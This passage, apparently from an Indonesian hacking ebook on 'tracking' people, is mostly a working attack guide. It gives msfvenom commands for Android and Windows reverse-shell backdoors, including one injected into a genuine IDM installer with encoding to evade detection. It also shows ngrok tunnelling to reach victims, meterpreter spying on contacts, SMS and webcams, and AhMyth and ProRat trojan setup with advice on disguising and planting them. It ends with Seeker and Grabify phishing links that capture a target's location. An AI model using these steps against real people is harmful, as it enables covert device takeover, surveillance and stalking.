0% menganggap dokumen ini bermanfaat (0 suara)
136 tayangan62 halaman

Panduan Lengkap Pelacakan dengan Metasploit

Diunggah oleh

epelsakti
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
136 tayangan62 halaman

Panduan Lengkap Pelacakan dengan Metasploit

Diunggah oleh

epelsakti
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd

Ebook Pelacakn By Rasi Tech

Social Media
Telegram Channel : @RasiTechChannel
YouTube : Rasi Tech | Cyber Ghost Hunter
Instagram : @Rasi_Tech
Discord : Rasi#1012
Email : rasiadilsejahtera@[Link]
Contact Telegram : @rasirt
Contact WhatsApp : +1 (215) 839-0773 | [Link]
Daftar Isi

1.1 Daftar isi


1.2 Pendahuluan
● 1.2.1 Apa itu pelacakan?
● 1.2.2 Bolehkah kita melakukan pelacakan?
1.3 Metode-metode pelacakan
● 1.3.1 Menggunakan Payload
○ [Link] Apa itu payload?
○ [Link] Metasploit
■ [Link].1 Pengenalan Metasploit
■ [Link].2 Instalasi Metasploit
● [Link].2.1 Instalasi Metasploit pada Linux Ubuntu
● [Link].2.2 Instalasi Metasploit pada Windows
● [Link].2.3 Instalasi Metasploit pada Termux
■ [Link].3 Membuat Payload android
● [Link].3.1 Membuat Payload satu jaringan
● [Link].3.2 Membuat Payload beda jaringan
■ [Link].4 Membuat Payload Windows
● [Link].4.1 Membuat Payload satu jaringan
● [Link].4.2 Membuat Payload satu jaringan
○ [Link] Remote Access Trojan (RAT)
■ [Link].1 Pengenalan RAT
■ [Link].2 Instalasi RAT
● [Link].2.1 Instalasi & Penggunaan RAT pada Linux
Ubuntu
● [Link].2.2 Instalasi & Penggunaan RAT pada Windows
● 1.3.2 Menggunakan Link
○ [Link] Membuat dengan Grabify
○ [Link] Membuat dengan Seeker
○ [Link] Membuat dengan Bot Telegram
○ [Link] Mengirim via dokumen
● 1.3.3 Menggunakan Network Sniffer
○ [Link] Apa itu network sniffer?
○ [Link] Melacak dengan Software Network Sniffer
■ [Link].1 Instalasi & Penggunaan Network Sniffer pada
Linux Ubuntu
■ [Link].2 Instalasi & Penggunaan Network Sniffer pada
Windows
○ [Link] Melacak dengan Extension Network Sniffer
■ [Link].1 Cara memasang Extension Network Sniffer
● 1.3.4 Menggunakan Email
○ [Link] Melacak menggunakan Aplikasi Find My Device
■ [Link].1 Apa itu Aplikasi Find My Device?
■ [Link].2 Cara penggunaan Aplikasi Find My Device
○ [Link] Melacak menggunakan Aplikasi TrackView
■ [Link].1 Apa itu Aplikasi TrackView?
■ [Link].2 Cara Penggunaan Aplikasi TrackView
● 1.3.5 Menggunakan Nomor HP
○ [Link] Melacak menggunakan Tools HLR Lookup
■ [Link].1 Apa itu HLR Lookup?
■ [Link].2 Cara penggunaan HLR Lookup
○ [Link] Melacak menggunakan bantuan Operator
● 1.3.6 Menggunakan Gambar
○ [Link] Melacak dengan tools GeoImg
○ [Link] Melacak dengan payload gambar
1.4 Daftar Pustaka
1.5 Tentang Penulis
1.2.1 Apa itu pelacakan?

Pelacakan atau melacak adalah metode atau cara yang digunakan ketika kita ingin
mengetahui lokasi dari apa yang ingin kita cari, contohnya seperti melacak rumah, melacak
kendaraan, melacak ponsel, atau melacak seseorang. Semisal ada temen yang ngomong
“Nemuin orangnya pakai cara melacak nomor hp nya aja”. Nah seperti itu.

1.2.2 Bolehkah kita melakukan pelacakan?

Kalo menurut mimin sih sebenarnya boleh-boleh saja asalkan tidak di gunakan untuk
kejahatan. Contohnya melacak penipu-penipu, melacak keberadaan bandar narkoba,
melacak pencurian hp dll.

1.3 Metode-metode pelacakan


1.3.1 Menggunakan Payload
[Link] Apa itu Payload?

Payload merupakan sebuah file executable milik penyusup yang akan di run pada komputer
korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau
memasang backdoor, trojan, virus, worm, dan lain-lain.
[Link] Metasploit
[Link].1 Pengenalan Metasploit

Metasploit (Metasploit Project)


Perangkat lunak
Diterjemahkan dari bahasa Inggris-Proyek Metasploit adalah proyek keamanan komputer
yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian
penetrasi dan pengembangan tanda tangan IDS. Sahamnya dimiliki oleh perusahaan
keamanan Boston, yang berbasis di Massachusetts, Massachusetts. Wikipedia (Inggris)

Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk
melakukan penetrasi ke dalam sebuah system.
metasploit framework bisa juga dikatakan sebagai sebuah platform pengembangan untuk
membuat tool security dan exploit.

Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby.


Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan
penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju.

Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun


penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan
komputer korban.

Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah
ditentukan oleh penyusup sistem pada komputer korban.
Exploit merupakan software yang berfungsi untuk memanfaatkan kelemahan pada software
korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut
memasukkan payload ke dalam memori korban.

Walaupun exploit sering digunakan untuk menyerang kerapuhan keamanan (security


vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak
diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk
mendemonstrasikan bahwa suatu sistem memiliki kerapuhan atau bug.
Metasploit framework mempunyai banyak kegunaan dalam berbagai bidang diantaranya
adalah:
-Pada bidang keamanan jaringan untuk melakukan tes penetrasi
-administrator sistem untuk memverifikasi instalasi dan patch sistemnya
-vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di
dunia
-Riset dan penelitian eksploitasi keamanan
-memahami cara kerja serangan
-Tes penetrasi
-Tes IPS/IDS
-Demo atau presentasi
-Legal hacking

[Link].2 Instalasi Metasploit


[Link].2.1 Instalasi Metasploit pada Linux Ubuntu

1. Download metasploit dulu disini [Link]

2. setelah di download buka terminal (Ctrl + alt T), lalu pindahkan alamat direktori ke tempat
metasploit yang tadi di download
Contoh : jika tool Metasploit masih ada di folder download maka pindah ke direktori
download terlebih dahulu , dengan perintah
Cd /Downloads

3. setelah pindah ke direktori tool metasploit berada , ketikkan perintah berikut


untuk mulai menginstall

sudo chmod +x [Link]

sudo ./[Link]

untuk yang 64 bit

sudo chmod +x [Link]

sudo ./[Link]

selesai.

setelah install berhasil untuk menggunakannya ketik perintah berikut di terminal

sudo msfconsole

atau jika ingin menggunakan versi GuI ketik

sudo msfgui

[Link].2.2 Instalasi Metasploit pada Windows

Langkah-Langkah Instalasi
1. kalian download dulu metasploitnya DISINI ukuran filenya kurang lebih 600mb sejak
artikel ini di rilis

2. setelah kalian download kalian buka filenya, klik next ( jangan lupa untuk mematikan anti
virus )
3. secara default filenya akan terletak di local disk C, kalian bisa mengatur sendiri letak
filenya kalau males ngatur, tinggal klik next

4. selanjutnya klik install


5. kalian tunggu aja instalasinya, agak memakan waktu lama.

6. jika sudah selesai, jalankan pada terminal


Cd/
Cd metasploit-framework
Cd bin
msfconsole
disini saya menaruh folder metasploit pada local disk D, jadinya saya harus masuk ke folder
metasploit-framework > bin dan klik [Link]
Instalasi Metasploit telah berhasil

[Link].2.3 Instalasi Metasploit pada Termux

Karena cara install ini sangat beresiko, maka sudah saya cantumkan 4 cara lain yang lebih
aman.

1. MetasploitTechzindia
Metasploit Tech india adalah repository github. Itu artinya kita akan meng clone filenya dari
sana. Tapi disini perintah yang digunakan adalah curl (langsung ke file bukan folder) bukan
git clone.

Oke, masukan saja perintah berikut:

$ pkg install curl


$ curl-LO
[Link]
[Link]
$ sh [Link]
$ cd metasploit-framework
$ ./msfconsole

Catatan:

Hilangkan logo $ saat menuliskan perintah.

sh [Link] adalah proses download metasploit, jadi tunggu sampai


prosesnya selesai (10-20 menit)

./msfconsole adalah perintah untuk menjalankan metasploit yang sudah terinstal.

2. Verluchie

Ini juga merupakan repository dari github. Hanya saja verluchi menggunakan git clone yang
artinya kita akan menginstall folder dari tool metasploit.

Namanya juga folder, jadi file utamanya berada di dalam. Berikut adalah cara instal dan
menemukan file di folder verluchi.

$ apt update && apt upgrade -y


$ pkg install git
$ git clone [Link]
$ cd termux-metasploit
$ chmod 777 [Link]
$ sh [Link]

Hasil clone dari metasploit verluchie adalah folder dengan nama termux-metasploit. Setelah
dibuka dengan perintah cd lalu harus diberikan izin dengan chmod 777.
Kemudian sh [Link] adalah proses install yang sebenarnya. Tunggu sampai prosesnya
selesai.

3. Hax4us

Sama dengan sumber lainya, metasploit Hax4us adalah file dari repository github. Dan
untuk pemasangannya masukan saja semua perintah dibawah ini:

$ apt update && upgrade


$ pkg install python
$ pkg install python2
$ pkg install git
$ pkg install wget
$ pkg install ruby
$ pkg install curl
$ git clone [Link] metasploit-termux
$ ./[Link]
$ cd $HOME/metasploit-framework
$ ./msfconsole

4. rapid7

Metasploit Rapid7 tidak perlu didownload melalui termux. Tapi dapat via android langsung
seperti mendownload file musik, gambar, dll.

Jadi apabila terjadi gagal dapat kalian resume kembali. Berbeda dengan proses download
melalui termux, apabila sekali gagal ya langsung [Link], Pertama download file
metasploit rapid7 disini

Selanjutnya pindahkan file metasploit di luar folder apapun di penyimpanan internal.


Kemudian masukan perintah berikut di aplikasi termux.

$ termux-setup-storage
$ pkg install unzip
$ cd /sdcard
$ unzip [Link]
$ cd [Link]
$ ./msfconsole
[Link].3 Membuat Payload Android
[Link].3.1 Membuat Payload satu jaringan

1. Buatlah sebuah payloads dimana bertujuan adalah sebagai backdoor, disini backdoor
payload yang kita buat adalah berbentuk .apk karena kita akan menyerang android. Dan
disinilah apa yang saya maksud untuk melakukan Social Engineering yaitu bagaimana
backdoor ini bisa anda install di android korban dan anda buka setelah anda install.
Bagaimana caranya itu terserah anda.

perintah yang kita gunakan adalah seperti pada gambar diatas, pada LPORT anda isikan
dengan Ip address anda dan pada LPORT anda masukkan port terserah anda dan jangan
port yang terpakai seperti 21,22,23 dll. Dan untuk nama backdoor itu terserah anda juga.
INGAT!!! jika anda menggunakan metasploit versi jadul anda takkan pernah menemukan
perintah msfvenom namun msfpayload.
Backdoor yang terbuat akan tersimpan di folder home anda.
2. Setelah anda membuat payload kemudian jalankan aplikasi metasploit anda dengan
perintah msfconsole, dan jika sudah terbuka akan keluar seperti pada gambar dibawah ini :

3. Kemudian ketik perintah use multi/handler . ini merupakan perintah di metasploit,


seperti pada gambar dibawah :

4. Kemudian set Payload di metasploit anda, karena kita ingin exploitasi android menurut
saya payload paling keren karena sering digunakan adalah android/meterpreter/reverse_tcp.
Untuk set nya gunakan perintah seperti pada gambar dibawah ini :
5. Jika anda sudah men-set payload kemudian anda set LPORT dan LHOST sesuai dengan
backdoor yang anda buat di langkah pertama, disini bertujuan adalah sebagai listener. :

6. Kemudian di langkah ini adalah yang sangat diperlukan, usahakan pada langkah ini
backdoor yang anda buat sudah terinstall di android korban dan anda jalankan. Jika sudah
langsung anda exploit, Jika berhasil akan keluar tag meterpreter seperti pada gambar
dibawah ini:
7. Setelah anda berhasil anda dapat mengambil alih android tersebut dan anda dapat
melakukan banyak hal. untuk perintah nya dapat anda cek dengan perintah help. disini saya
cuma menggunakan perintah biasa saja untuk spying2 gitu :D

Seperti pada gambar diatas saya ingin melihat semua kontak dan pesan pada android
korban. dan hasilnya akan tersimpan pada PC anda.

Contoh :
Oke cukup sekian dulu dari saya, buat siapa yang mau bertanya langsung saja bisa
komentar di bawah. Barangkali anda ada saran ingin belajar tentang apa InsyaAllah akan
saya Bantu . hehehe :D
Sampai Jumpa pada bahasan berikutnya :D See you :)

[Link].3.2 Membuat Payload beda jaringan

Bahan
- Kali OS
- Metasploit
- Ngrok
- Internet

Lanjutkan
kita setting port forward dulu, buka terminal dan ketikan perintah berikut.

#echo 1 > /proc/sys/net/ipv4/ip_forward

Jika sudah, kita siapkan port yang mau dipakai (bebas) dan buka ngroknya, gw pake yang
4455, tapi sebelumnya kita install dulu authtoken ngaroknya. Caranya masuk ke sini, login
dan copy authtokennya
Kemudian install, ketik perintah ini di terminal

#./ngrok authtoken xxxxxxxx

Nah nanti authtoken akan terinstall di /root/.ngrok2/[Link] , kalo udah gini baru kita
forward portnya, perintahnya

#./ngrok tcp 4455

Kalo buat backdoor kan kita pakai reverse tcp ip, jd yg di forward servicenya adalah tcp.
Kita buat payloadnya, kalo windows ya silahkan inject untuk windows, kalo disini gw mau
bikin payload buat android

#msfvenom -p android/meterpreter/reverse_tcp lhost=[Link] lport=17509 R >


[Link]
Buka metasploit dengan perintah ini

#msfconsole

Dan reverse_tcp attack deh, perintahnya ini dibawah

#use exploit/multi/handler

#set payload android/meterpreter/reverse_tcp

#set lhost [Link]

#set lport 4455

#exploit
Gampang kan? oh iya, kalo misalkan exploit sukses, tpi session meterpreternya run di
background kalian tinggal ketik ini di perintah terminal metasploitnya

#sessions -l

Nah nanti muncul id sessions yang aktif, tinggal ketik aja ini

#sessions -i (id)

Ya begitulah kira-kira, kalo udah dapet sessionnya eksekusi deh..

[Link].4 Membuat Payload Windows


[Link].4.1 Membuat Payload satu jaringan

1. kita lihat ip address kita dulu dengan cara mengetik perintah ~# ifconfig

2. kita akan menggunakan tools msfvenom jadi jika ingin melihat opsi-opsi lainya bisa
ketikan perintah berikut ~# msfvenom -h
3. disini ane menyimpan file official IDM direktori /root/Backdoor sedangkan untuk hasil
backdoor saya arahkan ke /root/Downloads

4. sekarang tinggal membuat file backdoor ke dalam installer IDM perintah seperti berikut :
~# msfvenom -a x86 --platform windows -x /root/Backdoor/[Link] -k -p
windows/meterpreter/reverse_tcp LHOST=[Link] LPORT=4444 -e
x86/shikata_ga_nai -i 9 -f exe -o /root/Desktop/[Link]

Keterangan :

● -a adalah architecture yang digunakan


● --platform adalah platform payload yang di buat
● -x posisi atau letak file exe yang hendak di injeksi
● -k perintah untuk pertahankan perilaku template([Link]) dan menyuntikkan payload
sebagai thread baru
● -p perintah untuk menentukan tipe payload windows/meterpreter/reverse_tcp adalah
tipe payload yang digunakan
● -LHOST adalah alamat IP kita
● -LPORT adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
● -e untuk memilih encoder yang digunakan
● x86/shikata_ga_nai adalah encoder yang digunakan
● -i iterations (jumlah encode payload)
● -f format output
● -o output hasil file yang telah di injeksi ( backdoor result )

5. file backdoor secara ajaib akan muncul hahaa

6. tinggal pinter-pinter ente, gimana caranya file output backdoor bisa terinstall di komputer
korban, yang pasti ini backdoor sama fungsinya seperti IDM official-nya, sayangnya ada
tapinya hehehe

7. tinggal eksekusi dengan cara ketikan perintah berikut ~# msfconsole


8. selanjutnya ketikan perintah berikut:

> use multi/handler


> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST [Link]
> set LPORT 4444
> exploit

9. tinggal eksekusi korban mau diapain bisa ketik perintah berikut:


> sysinfo fungsi untuk melihat informasi perangkat
> shell fungsi untuk masuk ke direktori file manager
> webcam_snap fungsi untuk menggunakan webcam korban
> help untuk melihat fungsi lebih banyak lagi

Kita akan tetap terhubung dengan komputer target sampai koneksi target terputus atau
target mematikan komputernya. dan sebaiknya ilmu dipergunakan dengan kegunaan yang
tepat.
[Link].4.2 Membuat Payload beda jaringan

Metasploit di luar LAN menggunakan ngrok

Langkah 1 - Siapkan Ngrok

Pertama langkah, buat akun gratis di ngrok . Ikuti Langkah 1, 2 dan 3 dari panduan
di bawah ini untuk mengaturnya.

Pengaturan Ngrok

Langkah 2 - Mulai Ngrok

Setelah pendaftaran selesai dan token autentikasi ditambahkan ke PC Anda, kami


akan mulai ngrok di Port TCP; katakanlah 9999 di mana metasploit akan
mendengarkan koneksi TCP terbalik yang masuk.

./ngrok tcp 9999

Menyiapkan Ngrok untuk Koneksi TCP Terbalik

Jika semuanya berjalan dengan baik, 'Status Sesi' akan berubah menjadi 'online'
dan sesuatu seperti ini akan ditampilkan di sebelah 'Penerusan'
Meneruskan tcp: //[Link]: 19631 -> localhost: 9999

Apa itu? Artinya, semua lalu lintas ke [Link] melalui port 19631 di internet,
akan dialihkan ke port 9999 di mesin tempat ini ngrok sesi sedang berjalan.
Tinggalkan di sana.

Langkah 3 - Buat Metasploit Payload menggunakan ngrok Nama Host


dan Port

Sekarang kami membuat payload dengan yang disebutkan di atas ngrok hostname
dan port sebagai LPORT payload dan LHOST. Gunakan perintah di bawah ini untuk
membuatnya.

msfvenom -p windows / meterpreter / reverse_tcp LHOST = [Link] LPORT =


19631 -f exe> [Link]

Di sini saya akan menggunakan sebuah jendela payload karena mesin target saya di
luar LAN adalah windows.

Langkah 4 - Mulai Metasploit Listener

Itu metasploit payload telah dibuat. Sekarang di mesin kami, kami akan memulai
metasploit pendengar menggunakan perintah di bawah ini.

gunakan exploit / multi / handler


set PAYLOAD windows / meterpreter / reverse_tcp
set LHOST [Link] set
PORT 9999
exploit

Saat Anda menjalankan 'exploit', ini akan memulai listener pada port 9999.

Langkah 5 - Membuat Koneksi Reverse TCP menggunakan Ngrok

Kirimkan saja file ini ke mesin target Anda dan jalankan file dengan mengklik dua
kali saya t.
[Link] Remote Access Trojan (RAT)
[Link].1 Pengenalan RAT

RAT singkatan Remote Access Trojan atau Remote Administration Tool. ... Menggunakan
RAT hacker dapat menginstal keyloggers dan virus berbahaya lainnya dari jarak jauh ke
komputer Anda, menginfeksi file pada sistem Anda dan banyak lagi.

[Link].2 Instalasi RAT


[Link].2.1 Instalasi & Penggunaan RAT pada Linux
Ubuntu

Untuk toolsnya sendiri ada banyak sekali namun saya berikan 1 tools saja yaitu
AhMyth Android RAT Namun ini versi untuk androidnya saja.
Cara Menggunakan AhMyth Android RAT

Tutorial Hacking Android RAT AhMyth: Tutorial meretas smartphone Android


untuk mendapatkan akses jarak jauh. Dalam tutorial ini, kita akan bekerja dengan
alat yang disebut AhMyth alat akses jarak jauh sumber terbuka AhMyth memiliki
banyak fitur yang Anda harapkan untuk dilihat di RAT seperti pemantauan
Geolokasi, modul SMS, Penampil Daftar Kontak, Manajer File, Snapshot Kamera,
Perekam mikrofon dan banyak lagi. AhMyth sangat mudah digunakan karena desain
GUI-nya yang sederhana dan efektif. AhMyth adalah alat akses jarak jauh
multi-platform yang tersedia untuk Linux, Windows & Apple OS.

AhMyth terdiri dari dua bagian.

● Sisi server: aplikasi desktop berdasarkan kerangka elektron (panel kontrol)


● Sisi klien: aplikasi android (pintu belakang)
Dalam tutorial ini, saya akan menggunakan sistem operasi berbasis Linux jika Anda
menggunakan Windows AhMyth juga memiliki versi Windows yang tersedia.

Pertama-tama, kita perlu menginstal AhMyth.

Prasyarat:

● Electron (untuk memulai aplikasi)


● Java (untuk menghasilkan pintu belakang APK)
● Electron-builder dan electron-packer (untuk membangun binari untuk (OSX,
WINDOWS, LINUX)

Pertama klon AhMyth ke perangkat Anda. Anda dapat melakukan ini dengan
memasukkan perintah di bawah ini di terminal perintah Linux.

git clone [Link]

CD berikutnya ke direktori AhMyth-Android-Rat.

cd AhMyth-Android-RAT

Mulai AhMyth menggunakan perintah di bawah ini.

npm mulai

Ketika saya pertama kali memulai AhMyth dengan npm saya mendapat kesalahan,
saya kemudian menggunakan perintah ini untuk meluncurkan AhMyth.

sudo npm start --unsafe-perm

Apa itu tag –unsafe-perm dan apa kekurangan dari penggunaannya.

Terima kasih, sam-github telah menjelaskan tag –unsafe-perm.

● con: skrip instalasi dijalankan sebagai root, dan Anda mungkin tidak
membaca semuanya untuk memastikannya aman terlebih dahulu.
● pro: tanpa mereka, tidak ada skrip instalasi yang dapat menulis ke disk di
folder modulnya sendiri, jadi kecuali skrip instal tidak melakukan apa-apa
selain mencetak beberapa hal sebagai standar, modul yang Anda perlukan
tidak akan diinstal.

Instal Metode 2

● Unduh biner dari [Link]

Seperti yang Anda lihat dari gambar di bawah, AhMyth telah berhasil dimulai.

Sekarang kami memiliki AhMyth menjalankan waktunya untuk mengkonfigurasi


server ini adalah aplikasi desktop berdasarkan kerangka kerja elektron (panel
kontrol) yang akan digunakan untuk membuat pendengar kembali ke perangkat yang
menyerang.

Pilih port mana yang Anda inginkan untuk menjalankan server AhMyth. Port default
adalah 42472

setelah port dipilih, klik tombol "Dengarkan" dari kanan atas aplikasi AhMyth.
Tangkapan layar menunjukkan server AhMyth berjalan pada port 42474

Sekarang setelah server berhasil memulai listener pada port yang dipilih, kita
sekarang dapat menggunakan "APK Builder" untuk membuat pintu belakang APK
Android.

Dari menu atas, klik "Pembuat APK"

Dalam tutorial ini, saya akan menggunakan pintu belakang dasar yang dihasilkan
oleh AhMyth. Anda juga dapat menyematkan backdoor ke APK asli dengan
menggunakan opsi bind APK.

Jika Anda berencana menggunakan AhMyth dalam jaringan Anda sendiri, gunakan
alamat IP lokal Anda Jika Anda berencana menggunakan AhMyth di luar jaringan
Anda sendiri, gunakan alamat IP publik Anda.
Gambar menunjukkan file APK pintu belakang berhasil dibuat dan ditampilkan di
direktori keluarannya.

Setelah file APK berhasil dibuat waktunya untuk memindahkannya ke perangkat


Android target. Gunakan metode pengiriman apa pun yang Anda suka untuk
mengirim backdoor berbahaya itu sepenuhnya terserah Anda sendiri. Metode Social
Engineering seringkali dapat bekerja paling baik saat mengirimkan muatan. Setelah
target menginstal aplikasi Android berbahaya dan meluncurkannya, perangkat target
akan muncul dari dalam menu target AhMyth.

Jika kami membuka perangkat Android yang disusupi dari daftar target, Anda
kemudian dapat menggunakan berbagai modul dari dalam AhMyth untuk melakukan
berbagai penilaian perangkat Android target.
Setelah perangkat Android disusupi. Setiap kali Anda membuka sesi dengan
perangkat. Windows akan ditampilkan dengan tulisan "Tetap Dididik". Dari menu di
dalam jendela, kita dapat menggunakan berbagai modul exploit.

File Manager memungkinkan file diakses dari dalam perangkat Android yang
disusupi.

Gambar menunjukkan file browser perangkat Android yang disusupi.


Gambar di bawah ini menunjukkan modul Geolocation dan lokasi perangkat Android
target.

Gambar menunjukkan lokasi perangkat Android yang disusupi. Untuk alasan privasi,
saya telah mematikan GPS saat mendemonstrasikan RAT ini.

Menggunakan pesan SMS AhMyth dapat dikirim dari perangkat Android yang
disusupi ke perangkat seluler lain. AhMyth juga dapat melihat Daftar SMS dari
perangkat Android target.
Gambar menunjukkan modul kirim SMS yang digunakan untuk mengirim pesan SMS
dan melihat daftar SMS perangkat Android yang disusupi.

[Link].2.2 Instalasi & Penggunan RAT pada


Windows
Kali ini saya akan share tentang salah satu software hacking, ‘’ProRat’’. ProRat
adalah salah satu tool/software hacking yang mempunyai fitur yang lumayan
lengkap, software ini adalah karya seseorang berkebangsaan Turkey yang memiliki
fungsi untuk menyusup kekomputer orang lain. Software ini bias dibilang sangat
istimewa karena fiturnya yang lengkap ditambah dengan cara pengoperasiannya
yang cukup mudah.

Baiklah penjelasannya cukup sampai disini, berikut tutorialnya:

Cara install ProRat:

1. Pastikan tidak ada anti virus sedang aktif di PC kita karena prorat akan terdeteksi
sebagai virus,padahal ProRat sama sekali tidak mengandung virus apapun yang
akan menyebabkan kerusakan pada PC kita

2. Ekstrak ProRat yang masih berupa Zip

3. Instal dan jalankan ProRat

*Langkah-langkah menggunakan ProRat

1. Siapkan IP dan port komputer korban yang terbuka, bisa juga dengan bantuan
software port scanner

2. Isikan IP dan Port korban di form IP yang terdapat di ProRat


3. Buat server untuk menginveksi PC korban dengan cara: create-create prorate
server lalu akan muncul tampilan Create Server

4. Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address


dengan IP kamu.

5. Klik tab General Setting, isikan Server Port (default 5110), Server, Password dan
Victim Name.

6. Klik tab bind with file, bind server with a file, select file (pilih file anti virus agar
tidak dicurigai) lalu klik create server

7. Klik tab Server extensions , centang EXE

8. Klik tab server icon, pilih icon yang kamu suka, lalu klik create server

9. Jalankan server tersebut di PC korban, terserah dengan cara apa saja memakai
teknik social engineering, disusupkan langsung ke PC korban, atau dengan cara
kamu sendiri. Kalau buat belajar, lebih simple disusupkan langsung ke salah satu
computer di warnet terdekat, dan berarti korban ProRatnya adalah komputer warnet
yang kamu infeksikan server tersebut

10. Setelah server berjalan di PC korban, kita bisa langsung mengkoneksikannya


dengan PC kita, Untuk koneksi kita dapat menggunakan ProConnective atau
langsung mengetikkan IP address dan Port komputer korban. ProConnective
adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi)
antara komputer server dan komputer client (korban). Akan nampak IP korban
apabila dia sedang on. Setelah berhasil melakukan koneksi ke komputer korban
maka status dari ProRat akan berubah dari Disconnected ke Connected

11. Setelah PC kita dan PC korban tersambung maka saatnya kita bermain

Permainannya mudah, kamu hanya tinggal memilih menu dari ProRat untu
mengacaukan PC korban, seperti mengirimkan pesan error (message), mematikan
PC korban (Shut Down PC), menjalankan program di PC korban (Run), menginstal
KeyLogger, dan masih banyak lagi.

Seru bukan?? Selamat mencoba,,, tapi ada baiknya kalau ini hanya digunakan untuk
ajang menambah ilmu, bukan untuk merugikan orang lain.

___________________________________________________________________
___________

___________________________________________________________________
___________

untuk mendapatkan solfware dan info lebih lanjut solfware Original Trojan ProRat
v1.9.

kirim email ke : a88a_a88a@[Link]

solfware Original Trojan ProRat v1.9 tidak dapat di Upload ke web mana pun.

kami hanya bisa mengirimkan dalam bentuk Paket

– CD Original solfware Trojan ProRat v1.9.

– CD tutorial dalam bentuk Video dan PDF.

jika anda lebih percaya dengan yang “Free”.

1.3.2 Menggunakan Link


[Link] Membuat dengan grabify

Cara Lacak Lokasi Menggunakan Grabify


Kalau cara lacak lokasi di atas dirasa cukup sulit karena perlu mengecek satu persatu IP
Address yang ada, Anda bisa menggunakan Grabify. Grabify merupakan situs yang
memungkinkan seseorang untuk melacak lokasi melalui URL asli yang disematkan IP
tracker di dalamnya. Berikut caranya:

● Pertama, buka situs apapun yang ingin Anda bagikan kepada seseoarang yang ingin
Anda ketahui lokasinya. Lalu, salin alamat URL dari situs tersebut.
● Kemudian, masuk ke situs Grabify.
● Tempel alamat URL tadi ke kolom Valid URL, dan tekan tombol Create URL.

● Selanjutnya, tekan tombol Copy untuk menyalin alamat URL baru milik Grabify.
Jangan tutup halaman ini, karena nantinya informasi lokasi seseorang akan
ditampilkan di halaman ini.

● Sekarang, kirimkan URL tadi ke orang yang ingin Anda kepoin. Misalnya, via
WhatsApp, Line, atau aplikasi chatting lainnya. Pastikan juga link tersebut diakses
olehnya.
● Ketika link diakses, kembali lagi ke halaman Grabify. Reload halaman tersebut, dan
scroll ke bawah.
● Di bagian Results, muncul informasi mulai dari tanggal, IP Address, geolokasi,
platform yang mengaksesnya, operator, dan lainnya. Tekan More Info untuk
mengetahui informasi lebih detil, seperti perangkat yang digunakan.
[Link] Membuat dengan Seeker

1. Oke step pertama kalian sruput dulu script nya dari githubnya
[Link]
2. Untuk cara install bisa lihat di bawah sini

Kali Linux / Ubuntu / Parrot OS


git clone [Link]
cd seeker/
apt update
apt install python3 python3-pip php
pip3 install requests

BlackArch Linux
pacman -S seeker

Termux
git clone [Link]
cd seeker/
pkg update
pkg install python php
pip3 install requests

Docker
docker pull thewhiteh4t/seeker

3. Nah langsung aja kalian jalankan script nya dengan mengetikan ini
python3 [Link] -t manual

rasitech@kali:~/seeker$ python3 [Link] -t manual

[+] Checking Dependencies...

__
______ ____ ____ | | __ ____ _______
/ ___/_/ __ \_/ __ \ | |/ /_/ __ \\_ __ \
\___ \ \ ___/\ ___/ | < \ ___/ | | \/
/____ > \___ >\___ >|__|_ \ \___ >|__|
\/ \/ \/ \/ \/

[>] Created By : thewhiteh4t


[>] Version : 1.2.5

[+] Checking for Updates.....[ Up-To-Date ]

[+] Skipping Serveo, start your own tunnel service manually...

[+] Select a Template :

[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] Telegram
[>]

4. Nah kalian pilih template nya kalo disini saya akan menggunakan WhatsApp saja jadi
saya pilih nomor 2
[+] Loading WhatsApp Template...
[+] Group Title : Group Islami Terkini
[+] Path to Group Img (Best Size : 300x300): [Link]

[+] Port : 8080


[+] Starting PHP Server......[ Success ]

[+] Waiting for User Interaction...

5. Untuk Title bisa kalian custom lalu untuk path bisa pakai ../ kalo berada di folder lain
file gambarnya tapi karena file profile saya sudah ada di dalam folder seeker jadi
saya hanya perlu mengetikan nama filenya saja tapi kalo mau yang folder berbeda
juga bisa kok contohnya seperti ini ../Download/[Link] FIlenya berada di folder
Download
6. Langkah selanjutnya kalian buka terminal baru dan pergi ke directory yang terdapat
file ngrok tapi kalo blm ada ngrok kalian bisa download di sini.
7. Ikuti step2 instalnya
8. kalo sudah di download dan setup nya di terminal kalian pergi ke directory yang
terdapat file ngrok lalu kalian ketikan ini

./ngrok http 8080

9. 8080 itu port yang terdapat di ngrok nya maka tampilannya seperti ini

ngrok by @inconshreveable (Ctrl+C to quit)

Session Status online


Account tlstfhrv7u (Plan: Free)
Update update available (version 2.3.39, Ctrl-U to update)
Version 2.3.35
Region United States (us)
Web Interface [Link]
Forwarding [Link] -> [Link]
Forwarding [Link] -> [Link]

Connections ttl opn rt1 rt5 p50 p90


0 0 0.00 0.00 0.00 0.00
10. kita tinggal pilih forwardingnya mau yang pakai SSL apa tidak dan tinggal copy saja,
contohnya saya akan copy yang SSL. [Link] lalu kalian
tinggal share ke korban saya

11. Selamat Mencoba (Sisca Kohl) :)

[Link] Membuat dengan Bot Telegram

1. Buka Telegram kalian


2. Cari Spy On Locator di Telegram kalian
3. Ketik /start
4. Ketik /create USERNAME
